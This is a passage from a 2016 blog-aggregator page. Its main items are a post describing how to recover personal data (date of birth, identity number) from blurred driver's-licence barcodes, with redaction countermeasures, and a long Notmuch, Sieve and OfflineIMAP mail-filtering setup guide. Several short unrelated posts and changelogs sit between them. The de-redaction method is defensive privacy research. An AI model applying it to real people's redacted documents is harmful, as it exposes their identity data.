We'll start by aligning the barcode with the pixel grid and moving it into a known position. Its vertical position on the driver's license is pretty standard, so finding the card's corners and doing a reverse perspective projection should do the job.

Finding the blue EU flag seemed like a good starting point for automating the transform. However, JPEG is quite harsh on high-contrast edges and extrapolating the card boundary from the flag corners wasn't too reliable. A simpler solution is to use manual adjustments: an image viewer is opened and clicking on the image moves the corners of a quadrilateral on top of the image. cv::findHomography() and cv::warpPerspective() are then used to map this quadrilateral to a 857×400 rectangular image, giving us a rectified image of the card.

Reduction & filtering

The bottom 60 pixel rows, now containing our barcode of interest, are then reduced to a single 1D column sum signal using cv::reduce(). In this waveform, wide bars (black) will appear as valleys and wide spaces (white) as peaks.

In Code 39, all characters are of equal width and consist of 3 wide and 9 narrow elements (hence the name). Only the positions of the wide elements need to be determined to be able to decode the characters. A 15-pixel convolution kernel – cv::GaussianBlur() – is applied to smooth out any narrow lines.

A rectangular kernel matched to the bar width would possibly be a better choice, but the exact bar width is unknown at this point.
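
For readers following along in Python, a rough cv2 equivalent of this reduction-and-filtering step (my sketch; the file name is hypothetical and the post itself uses the C++ API) could look like this:

import cv2

card = cv2.imread("card_rectified.png", cv2.IMREAD_GRAYSCALE)  # 857x400 rectified card
strip = card[-60:, :]                                          # bottom 60 rows containing the barcode

# Collapse the strip into one row of column sums: wide bars become valleys,
# wide spaces become peaks (cv2.REDUCE_SUM is the OpenCV 3.x constant).
signal = cv2.reduce(strip, 0, cv2.REDUCE_SUM, dtype=cv2.CV_32F)

# Smooth with a 15-pixel horizontal Gaussian kernel so narrow elements blur away.
smoothed = cv2.GaussianBlur(signal, (15, 1), 0)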

Constraints

The format of the driver's license barcode will always be *DDMMYY-NNNC*, where

  • The asterisks * are start and stop characters in Code 39
  • DDMMYY is the cardholder's date of birth
  • NNN is a number from 001 to 899, its least significant bit denoting gender
  • C is a modulo-31 checksum character; Code 39 doesn't provide its own checksum

These constraints will be used to limit the search space at each string position. For example, at positions 0 and 12, the asterisk is the only allowed character, whereas in position 1 we can have either the number 0, 1, 2, or 3 as part of a day of month.

If text on the card is readable then the corresponding barcode characters can be marked as already solved by narrowing the search space to a single character.

Decoding characters

It's a learning adventure so the decoder is implemented as a type of matched filter bank using matrix operations. Perhaps it could be GPU-friendly, too.

Each row of the filter matrix represents an expected 1D convolution output of one character. A row is generated by creating an all-zeroes vector with just the peak elements set to plus/minus unity. These rows are then convolved with a horizontal Lanczos kernel.

The exact positions of the peaks depend on the barcode's wide-to-narrow ratio, as Code 39 allows anything from 2:1 to 3:1. Experiments have shown it to be 2.75:1 in most of these cards.

The above 1D wave is divided into character-length pieces which are then multiplied per-element by this newly generated matrix using cv::Mat::mul(). The result is reduced to a row sum vector.

This vector now contains a "score", a kind of matched filter output, for each character in the search space. The best matching character is the one with the highest score; this maximum is found using cv::minMaxLoc(). Constraints are passed to the command as a binary mask matrix.

Barcode alignment and length

To determine the left and right boundaries of the barcode, an exhaustive search is run through the whole 1D signal (around 800 milliseconds). On each iteration the total score is calculated as a sum of character scores, and the alignment with the best total score is returned. This also readily gives us the best decoded string.

We can also enable checksum calculation and look for the best string with a valid checksum. This allows for errors elsewhere in the code.

Results

The barcodes in these images were fully recovered using the method presented above:

It might be possible to further develop the method to recover even more blurred images. Possible improvements could include fine-tuning the Lanczos kernel used to generate the filter bank, or coming up with a better way to score the matches.

Countermeasures

The best way to redact a barcode seems to be to draw a solid rectangle over it, preferably even slightly bigger than the barcode itself, and make sure it really gets rendered into the bitmap.

Printing an unlabeled barcode with sensitive data seems like a bad idea to begin with, but of course there could be a logical reason behind it.

by Oona Räisänen (noreply@blogger.com) at 2016-05-13 05:55

jwz

DNA Lounge update - jwz

DNA Lounge update, wherein the Snarkatron has been resurrected.

by jwz at 2016-05-13 05:02

Kevin and Kell

Plumber's snake - Kevin and Kell

Comic for Friday May 13th, 2016 - "Plumber's snake" [ view ]

On this day in 1996, Fiona was curious how Rudy was doing with his hunting ever since she started tutoring him. Not too good it would seem... [ view ]

Today's Daily Sponsor - No sponsor for this strip. [ support ]

by Kevin and Kell at 2016-05-13 05:00

xkcd.com

Black Hole - xkcd.com

It also brings all the boys, and everything else, to the yard.
Alt text: It also brings all the boys, and everything else, to the yard.

by xkcd.com at 2016-05-13 04:00

More Words, Deeper Hole

King George Needs a Home - More Words, Deeper Hole

Attention people in Waterloo County and neighboring regions:



10 year old King George is very sweet but shy. He needs a new home due to allergy issues. A friend is putting him up but her cats do not like him so that is probably not a long term solution.

If you would like to give a nice cat a nice home, contact george@literallysarah.com.

Also posted at Dreamwidth, where there are comment count unavailable comment(s); comment here or there.

by james_nicoll (jdnicoll@panix.com) at 2016-05-13 03:57

jwz

"One is supposed to put their penis into the hole lined with teeth." - jwz

I'm just gonna let Violet field this one:

From: Violet Blue
Subject: my new nightmare can be yours now too

I'm a dick for sending you this, but at least I don't have to suffer alone.

Here's the skeleton head for the base of a sex robot in production by Realbotix, the V2 which is called "Nova"

One is supposed to put their penis into the hole lined with teeth.

Let me ruin sex for you some more. Here's a video of the head making facial expressions without makeup:

Found via The Early Makings of a Talking Sex Robot.

If you must inflict this on the public, I don't mind if you screencap/quote this email. I almost feel like people should be warned about the coming storm of vagina dentata roombatas, certain to hoover up everyone's interest to sex once they see how the sausage is ground (in their impending nightmares, of course), so I might post about it outside my Sex News roundup later today.

Gotta go stash weapons around the house now, BRB.

by jwz at 2016-05-13 02:19

Planet Python

Dataquest: Matplotlib tutorial: Plotting tweets mentioning Trump, Clinton & Sanders - Planet Python

Analyzing Tweets with Pandas and Matplotlib

Python has a variety of visualization libraries, including seaborn, networkx, and vispy. Most Python visualization libraries are based wholly or partially on matplotlib, which often makes it the first resort for making simple plots, and the last resort for making plots too complex to create in other libraries.

In this matplotlib tutorial, we’ll cover the basics of the library, and walk through making some intermediate visualizations.

We’ll be working with a dataset of approximately 240,000 tweets about Hillary Clinton, Donald Trump, and Bernie Sanders, all current candidates for president of the United States.

The data was pulled from the Twitter Streaming API, and the csv of all 240,000 tweets can be downloaded here. If you want to scrape more data yourself, you can look here for the scraper code.

Exploring tweets with Pandas

Before we get started with plotting, let’s load in the data and do some basic exploration. We can use Pandas, a Python library for data analysis, to help us with this. In the below code, we’ll:

  • Import the Pandas library.
  • Read tweets.csv into a Pandas DataFrame.
  • Print the first...
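
A minimal sketch of those first steps (my code, assuming the tweets.csv linked above):

import pandas as pd

tweets = pd.read_csv("tweets.csv")  # load the tweets into a DataFrame
print(tweets.head())                # peek at the first few rows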

by Planet Python at 2016-05-13 01:48

jwz

Long Live the New Flesh - jwz

I'm glad to see PETA finally doing something worthwhile by giving us the body-horror that Cronenberg has been slacking on!

by jwz at 2016-05-13 01:45

Planet Debian

Norbert Preining: TeX Live 2016 (pretest) hits Debian/unstable - Planet Debian

The sources of the TeX Live binaries are now (hopefully) frozen, and barring unpleasant surprises, this is the code that will go into the final release (one fix for luatex is still coming, though). Thus, I thought it was time to upload TeX Live 2016 packages to Debian/unstable to expose them to a wider testing audience – packages in experimental receive hardly any testing.

texlive-2016-debian-pretest

The biggest changes are with Luatex, where APIs were changed fundamentally, and practically every package using luatex-specific code needs to be adjusted. Most of the package authors have already uploaded fixed versions to CTAN and thus to TeX Live, but some are surely still open. I have taken the step to provide driver files for pgf and pgfplots to support pgf with luatex (as I need it myself).

One more thing to be mentioned is that the binaries finally bring support for reproducible builds by supporting the SOURCE_DATE_EPOCH environment variable.

Please send bug reports, suggestions, and improvements (patches welcome!) to improve the quality of the packages. In particular, lintian complains a lot about various man page problems. If someone wants to go through all that it would help a lot. Details on request.

Other than that, many packages have been updated or added since the last Debian packages, here are the incomplete lists (I had accidentally deleted the tlmgr.log file at some point):

new: acmart, chivo, coloring, dvisvgm-def, langsci, makebase, pbibtex-base, platex, ptex-base, ptex-fonts, rosario, uplatex, uptex-base, uptex-fonts.

updated: achemso, acro, arabluatex, arydshln, asymptote, babel-french, biblatex-ieee, bidi, bookcover, booktabs, bxjscls, chemformula, chemmacros, cslatex, csplain, cstex, dtk, dvips, epspdf, fibeamer, footnotehyper, glossaries, glossaries-extra, gobble, graphics, gregoriotex, hyperref, hyperxmp, jadetex, jslectureplanner, koma-script, kpathsea, latex-bin, latexmk, lollipop, luaotfload, luatex, luatexja, luatexko, mathastext, mcf2graph, mex, microtype, msu-thesis, m-tx, oberdiek, pdftex, pdfx, pgf, pgfplots, platex, pmx, pst-cie, pst-func, pst-ovl, pst-plot, ptex, ptex-fonts, reledmac, shdoc, substances, tasks, tetex, tools, uantwerpendocs, ucharclasses, uplatex, uptex, uptex-fonts, velthuis, xassoccnt, xcolor, xepersian, xetex, xgreek, xmltex.

Enjoy.

by Norbert Preining at 2016-05-13 01:22

May 12, 2016

Planet Ubuntu

Zygmunt Krynicki: snapd updated to 2.0.3 - Planet Ubuntu

Ubuntu 16.04 has just been updated with a new release of snapd (2.0.3)

Our release manager, Michael Vogt, has prepared and pushed this release into the Ubuntu archive. You can look at the associated milestone sru-1 on Launchpad for more details.

Work is already under way on sru-2

You can find the changelog below.

   * New upstream micro release:
     - integration-tests, debian/tests: add unity snap autopkg test
     - snappy: introduce first feature flag for assumes: common-data-dir
     - timeout,snap: add YAML unmarshal function for timeout.Timeout
     - many: go into state.Retry state when unmounting a snap fails. (LP: #1571721, #1575399)
     - daemon,client,cmd/snap: improve output after snap install/refresh/remove (LP: #1574830)
     - integration-tests, debian/tests: add test for home interface
     - interfaces,overlord: support unversioned data
     - interfaces/builtin: improve the bluez interface
     - cmd: don't include the unit tests when building with go test -c for integration tests
     - integration-tests: teach some new trick to the fake store, reenable the app refresh test
     - many: move with some simplifications test snap building to snap/snaptest
     - asserts: define type for revision related errors
     - snap/snaptest,daemon,overlord/ifacestate,overlord/snapstate: unify mocking snaps behind MockSnap
     - snappy: fix openSnapFile's handling of sideInfo
     - daemon: improve snap sideload form handling
     - snap: add short and long description to the man-page (LP: #1570280)
     - snappy: remove unused SetProperty
     - snappy: use more accurate test data
     - integration-tests: add a integration test about remove removing all revisions
     - overlord/snapstate: make "snap remove" remove all revisions of a snap (LP: #1571710)
     - integration-tests: re-enable a bunch of integration tests
     - snappy: remove unused dbus code
     - overlord/ifacestate: fix setup-profiles to use new snap revision for setup (LP: #1572463)
     - integration-tests: add regression test for auth bug LP:#1571491
     - client, snap: remove obsolete TypeCore which was used in the old SystemImage days
     - integration-tests: add apparmor test
     - cmd: don't perform type assertion when we know error to be nil
     - client: list correct snap types
     - intefaces/builtin: allow getsockname on connected x11 plugs (LP: #1574526)
     - daemon,overlord/snapstate: read name out of sideloaded snap early, improved change summary
     - overlord: keep tasks unlinked from a change hidden, prune them
     - integration-tests: snap list on fresh boot is good again
     - integration-tests: add partial term to the find test
     - integration-tests: changed default release to 16
     - integration-tests: add regression test for snaps not present after reboot
     - integration-tests: network interface
     - integration-tests: add proxy related environment variables to snapd env file
     - README.md: snappy => snap
     - etc: trivial typo fix (LP:#1569892)
     - debian: remove unneeded /var/lib/snapd/apparmor/additional directory (LP: #1569577)

by Zygmunt Krynicki (noreply@blogger.com) at 2016-05-12 23:47

Planet Python

Anarcat: Notmuch, offlineimap and Sieve setup - Planet Python

I've been using Notmuch since about 2011, switching away from Mutt to deal with the monstrous amount of emails I was, and still am, dealing with on the computer. I have contributed a few patches and configs on the Notmuch mailing list, but basically, I have given up on merging patches, and instead have a custom config in Emacs that extends it the way I want. In the last 5 years, Notmuch has progressed significantly, so I haven't found the need to patch it or make sweeping changes.

The huge INBOX of death

The one thing that is problematic with my use of Notmuch is that I end up with a ridiculously large INBOX folder. Before the cleanup I did this morning, I had over 10k emails in there, out of about 200k emails overall.

Since I mostly work from my laptop these days, the Notmuch tags are only on the laptop, and not propagated to the server. This makes accessing the mail spool directly, from webmail or simply through a local client (say Mutt) on the server, really inconvenient, because it has to load a very large spool of mail, which is very slow in Mutt. Even worse, a bunch of mail that was archived in Notmuch shows up in the spool, because archiving in Notmuch just removes tags: the mails are still in the inbox, even though they are marked as read.

So I was hoping that Notmuch would help me deal with the giant inbox of death problem, but in fact, when I don't use Notmuch, it actually makes the problem worse. Today, I did a bunch of improvements to my setup to fix that.

The first thing I did was to kill procmail, which I was surprised to discover has been dead for over a decade. I switched over to Sieve for filtering, having already switched to Dovecot a while back on the server. I tried to use the procmail2sieve.pl conversion tool but it didn't work very well, so I basically rewrote the whole file. Since I was mostly using Notmuch for filtering, there wasn't much left to convert.

Sieve filtering

But this is where things got interesting: Sieve is so much simpler to use and more intuitive that I started doing more interesting stuff in bridging the filtering system (Sieve) with the tagging system (Notmuch). Basically, I use Sieve to split large chunks of emails off my main inbox, to try to remove as much spam, bulk email, notifications and mailing lists as possible from the larger flow of emails. Then Notmuch comes in and does some fine-tuning, assigning tags to specific mailing lists or topics, and being generally the awesome search engine that I use on a daily basis.

Dovecot and Postfix configs

For all of this to work, I had to tweak my mail servers to talk sieve. First, I enabled sieve in Dovecot:

--- a/dovecot/conf.d/15-lda.conf
+++ b/dovecot/conf.d/15-lda.conf
@@ -44,5 +44,5 @@

 protocol lda {
   # Space separated list of plugins to load (default is global mail_plugins).
-  #mail_plugins = $mail_plugins
+  mail_plugins = $mail_plugins sieve
 }

Then I had to switch from procmail to dovecot for local delivery, that was easy, in Postfix's perennial main.cf:

#mailbox_command = /usr/bin/procmail -a "$EXTENSION"
mailbox_command = /usr/lib/dovecot/dovecot-lda -a "$RECIPIENT"

Note that dovecot takes the full recipient as an argument, not just the extension. That's normal. It's clever, it knows that kind of stuff.

One last tweak I did was to enable automatic mailbox creation and subscription, so that the automatic extension filtering (below) can create mailboxes on the fly:

--- a/dovecot/conf.d/15-lda.conf
+++ b/dovecot/conf.d/15-lda.conf
@@ -37,10 +37,10 @@
 #lda_original_recipient_header =

 # Should saving a mail to a nonexistent mailbox automatically create it?
-#lda_mailbox_autocreate = no
+lda_mailbox_autocreate = yes

 # Should automatically created mailboxes be also automatically subscribed?
-#lda_mailbox_autosubscribe = no
+lda_mailbox_autosubscribe = yes

 protocol lda {
   # Space separated list of plugins to load (default is global mail_plugins).

Sieve rules

Then I had to create a Sieve ruleset. That thing lives in ~/.dovecot.sieve, since I'm running Dovecot. Your provider may accept an arbitrary ruleset like this, or you may need to go through a web interface, or who knows. I'm assuming you're running Dovecot and have a shell from now on.

The first part of the file is simply to enable a bunch of extensions, as needed:

# Sieve Filters
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples
# https://tools.ietf.org/html/rfc5228
require "fileinto";
require "envelope";
require "variables";
require "subaddress";
require "regex";
require "vacation";
require "vnd.dovecot.debug";

Some of those are not used yet, for example I haven't tested the vacation module yet, but I have good hopes that I can use it as a way to announce a special "urgent" mailbox while I'm traveling. The rationale is to have a distinct mailbox for urgent messages that is announced in the autoreply, that hopefully won't be parsable by bots.

Spam filtering

Then I filter spam using this fairly standard expression:

########################################################################
# spam 
# possible improvement, server-side:
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples#Filtering_using_the_spamtest_and_virustest_extensions
if header :contains "X-Spam-Flag" "YES" {
  fileinto "junk";
  stop;
} elsif header :contains "X-Spam-Level" "***" {
  fileinto "greyspam";
  stop;
}

This puts stuff into the junk or greyspam folder, based on the severity. I am very aggressive with spam: stuff often ends up in the greyspam folder, which I need to check from time to time, but it beats having too much spam in my inbox.

Mailing lists

Mailing lists are generally put into a lists folder, with some mailing lists getting their own folder:

########################################################################
# lists
# converted from procmail
if header :contains "subject" "FreshPorts" {
    fileinto "freshports";
} elsif header :contains "List-Id" "alternc.org" {
    fileinto "alternc";
} elsif header :contains "List-Id" "koumbit.org" {
    fileinto "koumbit";
} elsif header :contains ["to", "cc"] ["lists.debian.org",
                                       "anarcat@debian.org"] {
    fileinto "debian";
# Debian BTS
} elsif exists "X-Debian-PR-Message" {
    fileinto "debian";
# default lists fallback
} elsif exists "List-Id" {
    fileinto "lists";
}

The idea here is that I can safely subscribe to lists without polluting my mailbox by default. Further processing is done in Notmuch.

Extension matching

I also use the magic +extension tag on emails. If you send email to, say, foo+extension@example.com then the emails end up in the foo folder. This is done with the help of the following recipe:

########################################################################
# wildcard +extension
# http://wiki.dovecot.org/Pigeonhole/Sieve/Examples#Plus_Addressed_mail_filtering
if envelope :matches :detail "to" "*" {
  # Save name in ${name} in all lowercase.
  # Joe, joe, jOe thus all become 'joe'.
  set :lower "name" "${1}";
  fileinto "${name}";
  #debug_log "filed into mailbox ${name} because of extension";
  stop;
}

This is actually very effective: any time I register to a service, I try as much as possible to add a +extension that describe the service. Of course, spammers and marketers (it's the same really) are free to drop the extension and I suspect a lot of them do, but it helps with honest providers and this actually sorts a lot of stuff out of my inbox into topically-defined folders.

It is also a security issue: someone could flood my filesystem with tons of mail folders, which would cripple the IMAP server and eat all the inodes, 4 times faster than just sending emails. But I guess I'll cross that bridge when I get there: anyone can flood my address and I have other mechanisms to deal with this.

The trick is to then assign tags to all folders so that they appear in the Notmuch-emacs welcome view:

echo tagging folders
for folder in $(ls -ad $HOME/Maildir/${PREFIX}*/ | egrep -v "Maildir/${PREFIX}(feeds.*|Sent.*|INBOX/|INBOX/Sent)\$"); do
    tag=$(echo $folder | sed 's#/$##;s#^.*/##')
    notmuch tag +$tag -inbox tag:inbox and not tag:$tag and folder:${PREFIX}$tag
done

This is part of my notmuch-tag script that includes a lot more fine-tuned filtering, detailed below.

Automated reports filtering

Another thing I get a lot of is machine-generated "spam". Well, it's not commercial spam, but it's a bunch of Nagios, cron jobs, and god knows what software thinks it's important to send me emails every day. I get a lot less of those these days since I'm off work at Koumbit, but still, those can be useful for others as well:

if anyof (exists "X-Cron-Env",
          header :contains ["subject"] ["security run output",
                                        "monthly run output",
                                        "daily run output",
                                        "weekly run output",
                                        "Debian Package Updates",
                                        "Debian package update",
                                        "daily mail stats",
                                        "Anacron job",
                                        "nagios",
                                        "changes report",
                                        "run output",
                                        "[Systraq]",
                                        "Undelivered mail",
                                        "Postfix SMTP server: errors from",
                                        "backupninja",
                                        "DenyHosts report",
                                        "Debian security status",
                                        "apt-listchanges"
                                        ],
           header :contains "Auto-Submitted" "auto-generated",
           envelope :contains "from" ["nagios@",
                                      "logcheck@"])
    {
    fileinto "rapports";
}
# imported from procmail
elsif header :comparator "i;octet" :contains "Subject" "Cron" {
  if header :regex :comparator "i;octet"  "From" ".*root@" {
        fileinto "rapports";
  }
}
elsif header :comparator "i;octet" :contains "To" "root@" {
  if header :regex :comparator "i;octet"  "Subject" "\\*\\*\\* SECURITY" {
        fileinto "rapports";
  }
}
elsif header :contains "Precedence" "bulk" {
    fileinto "bulk";
}

Refiltering emails

Of course, after all this I still had thousands of emails in my inbox, because the sieve filters apply only on new emails. The beauty of Sieve support in Dovecot is that there is a neat sieve-filter command that can reprocess an existing mailbox. That was a lifesaver. To run a specific sieve filter on a mailbox, I simply run:

sieve-filter .dovecot.sieve INBOX 2>&1 | less

Well, this doesn't do anything. To really execute the filters, you need the -e flag, and to write to the INBOX for real, you need the -W flag as well, so the real run looks something more like this:

sieve-filter -e -W -v .dovecot.sieve INBOX > refilter.log 2>&1

The funky output redirects are necessary because this outputs a lot of crap. Also note that, unfortunately, the fake run output differs from the real run and is actually more verbose, which makes it really less useful than it could be.

Archival

I also usually archive my mails every year, rotating my mailbox into an Archive.YYYY directory. For example, now all mails from 2015 are archived in an Archive.2015 directory. I used to do this with Mutt tagging and it was a little slow and error-prone. Now, I simply have this Sieve script:

require ["variables","date","fileinto","mailbox", "relational"];

# Extract date info
if currentdate :matches "year" "*" { set "year" "${1}"; }

if date :value "lt" :originalzone "date" "year" "${year}" {
  if date :matches "received" "year" "*" {
    # Archive Dovecot mailing list items by year and month.
    # Create folder when it does not exist.
    fileinto :create "Archive.${1}";
  }
}

I went from 15613 to 1040 emails in my real inbox with this process (including refiltering with the default filters as well).

Notmuch configuration

My Notmuch configuration is in three parts: I have small settings in ~/.notmuch-config. The gist of it is:

[new]
tags=unread;inbox;
ignore=

#[maildir]
# synchronize_flags=true
# tentative patch that was refused upstream
# http://mid.gmane.org/1310874973-28437-1-git-send-email-anarcat@koumbit.org
#reckless_trash=true

[search]
exclude_tags=deleted;spam;

I omitted the fairly trivial [user] section for privacy reasons and [database] for declutter.

Then I have a notmuch-tag script symlinked into ~/Maildir/.notmuch/hooks/post-new. It does way too much stuff to describe in detail here, but here are a few snippets:

if hostname | grep angela > /dev/null; then
    PREFIX=Anarcat/
else
    PREFIX=.
fi

This sets a variable that makes the script work on my laptop (angela), where mailboxes are in Maildir/Anarcat/foo, or on the server, where mailboxes are in Maildir/.foo.

I also have special rules to tag my RSS feeds, which are generated by feed2imap, which is documented shortly below:

echo tagging feeds
( cd $HOME/Maildir/ && for feed in ${PREFIX}feeds.*; do
    name=$(echo $feed | sed "s#${PREFIX}feeds\\.##")
    notmuch tag +feeds +$name -inbox folder:$feed and not tag:feeds
done )

Another example that would be useful is how to tag mailing lists; for example, this removes the inbox tag and adds the notmuch tags to emails from the notmuch mailing list:

notmuch tag +lists +notmuch      -inbox tag:inbox and "to:notmuch@notmuchmail.org"

Finally, I have a bunch of special keybindings in ~/.emacs.d/notmuch-config.el:

;; autocompletion
(eval-after-load "notmuch-address"
  '(progn
     (notmuch-address-message-insinuate)))

; use fortune for signature, config is in custom
(add-hook 'message-setup-hook 'fortune-to-signature)
; don't remember what that is
(add-hook 'notmuch-show-hook 'visual-line-mode)

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; keymappings
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(define-key notmuch-show-mode-map "S"
  (lambda ()
    "mark message as spam and advance"
    (interactive)
    (notmuch-show-tag '("+spam" "-unread"))
    (notmuch-show-next-open-message-or-pop)))

(define-key notmuch-search-mode-map "S"
  (lambda (&optional beg end)
    "mark message as spam and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "+spam" "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-show-mode-map "H"
  (lambda ()
    "mark message as spam and advance"
    (interactive)
    (notmuch-show-tag '("-spam"))
    (notmuch-show-next-open-message-or-pop)))

(define-key notmuch-search-mode-map "H"
  (lambda (&optional beg end)
    "mark message as spam and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-spam") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "l" 
  (lambda (&optional beg end)
    "undelete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "u"
  (lambda (&optional beg end)
    "undelete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "-deleted") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-search-mode-map "d"
  (lambda (&optional beg end)
    "delete and advance"
    (interactive (notmuch-search-interactive-region))
    (notmuch-search-tag (list "+deleted" "-unread") beg end)
    (anarcat/notmuch-search-next-message)))

(define-key notmuch-show-mode-map "d"
  (lambda ()
    "delete current message and advance"
    (interactive)
    (notmuch-show-tag '("+deleted" "-unread"))
    (notmuch-show-next-open-message-or-pop)))

;; https://notmuchmail.org/emacstips/#index17h2
(define-key notmuch-show-mode-map "b"
  (lambda (&optional address)
    "Bounce the current message."
    (interactive "sBounce To: ")
    (notmuch-show-view-raw-message)
    (message-resend address)
    (kill-buffer)))

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;; my custom notmuch functions
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
(defun anarcat/notmuch-search-next-thread ()
  "Skip to next message from region or point

This is necessary because notmuch-search-next-thread just starts
from point, whereas it seems to me more logical to start from the
end of the region."
  ;; move line before the end of region if there is one
  (unless (= beg end)
    (goto-char (- end 1)))
  (notmuch-search-next-thread))

;; Linking to notmuch messages from org-mode
;; https://notmuchmail.org/emacstips/#index23h2
(require 'org-notmuch nil t)

(message "anarcat's custom notmuch config loaded")

This is way too long: in my opinion, a bunch of that stuff should be factored into upstream, but some features have been hard to get in. For example, Notmuch is really hesitant about marking emails as deleted. The community is also very strict about having unit tests for everything, which makes writing new patches a significant challenge for a newcomer, who will often need to be familiar with both Elisp and C. So for now I just have those configs that I carry around.

Emails marked as deleted or spam are processed with the following script named notmuch-purge which I symlink to ~/Maildir/.notmuch/hooks/pre-new:

#!/bin/sh

if hostname | grep angela > /dev/null; then
    PREFIX=Anarcat/
else
    PREFIX=.
fi

echo moving tagged spam to the junk folder
notmuch search --output=files tag:spam \
        and not folder:${PREFIX}junk \
        and not folder:${PREFIX}greyspam \
        and not folder:Koumbit/INBOX \
        and not path:Koumbit/** \
    | while read file; do
          mv "$file" "$HOME/Maildir/${PREFIX}junk/cur"
      done

echo unconditionally deleting deleted mails
notmuch search --output=files tag:deleted | xargs -r rm

Oh, and there's also customization for Notmuch:

;; -*- mode: emacs-lisp; auto-recompile: t; -*-
(custom-set-variables
 ;; from https://anarc.at/sigs.fortune
 '(fortune-file "/home/anarcat/.mutt/sigs.fortune")
 '(message-send-hook (quote (notmuch-message-mark-replied)))
 '(notmuch-address-command "notmuch-address")
 '(notmuch-always-prompt-for-sender t)
 '(notmuch-crypto-process-mime t)
 '(notmuch-fcc-dirs
   (quote
    ((".*@koumbit.org" . "Koumbit/INBOX.Sent")
     (".*" . "Anarcat/Sent"))))
 '(notmuch-hello-tag-list-make-query "tag:unread")
 '(notmuch-message-headers (quote ("Subject" "To" "Cc" "Bcc" "Date" "Reply-To")))
 '(notmuch-saved-searches
   (quote
    ((:name "inbox" :query "tag:inbox and not tag:koumbit and not tag:rt")
     (:name "unread inbox" :query "tag:inbox and tag:unread")
     (:name "unread" :query "tag:unread")
     (:name "freshports" :query "tag:freshports and tag:unread")
     (:name "rapports" :query "tag:rapports and tag:unread")
     (:name "sent" :query "tag:sent")
     (:name "drafts" :query "tag:draft"))))
 '(notmuch-search-line-faces
   (quote
    (("deleted" :foreground "red")
     ("unread" :weight bold)
     ("flagged" :foreground "blue"))))
 '(notmuch-search-oldest-first nil)
 '(notmuch-show-all-multipart/alternative-parts nil)
 '(notmuch-show-all-tags-list t)
 '(notmuch-show-insert-text/plain-hook
   (quote
    (notmuch-wash-convert-inline-patch-to-part notmuch-wash-tidy-citations notmuch-wash-elide-blank-lines notmuch-wash-excerpt-citations)))
 )

I think that covers it.

Offlineimap

So of course the above works well on the server directly, but how do I run Notmuch on a remote machine that doesn't have access to the mail spool directly? This is where OfflineIMAP comes in. It allows me to incrementally synchronize a local Maildir folder hierarchy with a remote IMAP server. I am assuming you already have an IMAP server configured, since you already configured Sieve above.

Note that other synchronization tools exist. The other popular one is isync but I had trouble migrating to it (see courriels for details) so for now I am sticking with OfflineIMAP.

The configuration is fairly simple:

[general]
accounts = Anarcat
ui = Blinkenlights
maxsyncaccounts = 3

[Account Anarcat]
localrepository = LocalAnarcat
remoterepository = RemoteAnarcat
# refresh all mailboxes every 10 minutes
autorefresh = 10
# run notmuch after refresh
postsynchook = notmuch new
# sync only mailboxes that changed
quick = -1
## possible optimisation: ignore mails older than a year
#maxage = 365

# local mailbox location
[Repository LocalAnarcat]
type = Maildir
localfolders = ~/Maildir/Anarcat/

# remote IMAP server
[Repository RemoteAnarcat]
type = IMAP
remoteuser = anarcat
remotehost = anarc.at
ssl = yes
# without this, the cert is not verified (!)
sslcacertfile = /etc/ssl/certs/DST_Root_CA_X3.pem
# do not sync archives
folderfilter = lambda foldername: not re.search('(Sent\.20[01][0-9]\..*)', foldername) and not re.search('(Archive.*)', foldername)
# and only subscribed folders
subscribedonly = yes
# don't reconnect all the time
holdconnectionopen = yes
# get mails from INBOX immediately, doesn't trigger postsynchook
idlefolders = ['INBOX']

Critical parts are:

  • postsynchook: obviously, we want to run notmuch after fetching mail
  • idlefolders: receives emails immediately without waiting for the longer autorefresh delay, which means that most mailboxes don't see new emails for up to 10 minutes in the worst case. Unfortunately, it doesn't run the postsynchook, so I need to hit G in Emacs to see new mail
  • quick=-1, subscribedonly, holdconnectionopen: makes most runs much, much faster as it skips unchanged or unsubscribed folders and keeps the connection to the server

The other settings should be self-explanatory.

RSS feeds

I gave up on RSS readers, or more precisely, I merged RSS feeds and email. The first time I heard of this, it sounded like a horrible idea, because it means yet more emails! But with proper filtering, it's actually a really nice way to process emails, since it leverages the distributed nature of email.

For this I use a fairly standard feed2imap, although I do not deliver to an IMAP server, but straight to a local Maildir. The configuration looks like this:

---
include-images: true
target-prefix: &target "maildir:///home/anarcat/Maildir/.feeds."
feeds:
- name: Planet Debian
  url: http://planet.debian.org/rss20.xml
  target: [ *target, 'debian-planet' ]

I obviously have more feeds; the above is just an example. This will deliver the feeds as emails in one mailbox per feed, in ~/Maildir/.feeds.debian-planet in the above example.

Troubleshooting

You will fail at writing the sieve filters correctly, and mail will (hopefully?) fall through to your regular mailbox. Syslog will tell you things fail, as expected, and details are in your .dovecot.sieve.log file in your home directory.

I also enabled debugging on the Sieve module:

--- a/dovecot/conf.d/90-sieve.conf
+++ b/dovecot/conf.d/90-sieve.conf
@@ -51,6 +51,7 @@ plugin {
        # deprecated imapflags extension in addition to all extensions were already
   # enabled by default.
   #sieve_extensions = +notify +imapflags
+  sieve_extensions = +vnd.dovecot.debug

   # Which Sieve language extensions are ONLY available in global scripts. This
   # can be used to restrict the use of certain Sieve extensions to administrator

This allowed me to use the debug_log function in the rulesets to output stuff directly to the logfile.

Further improvements

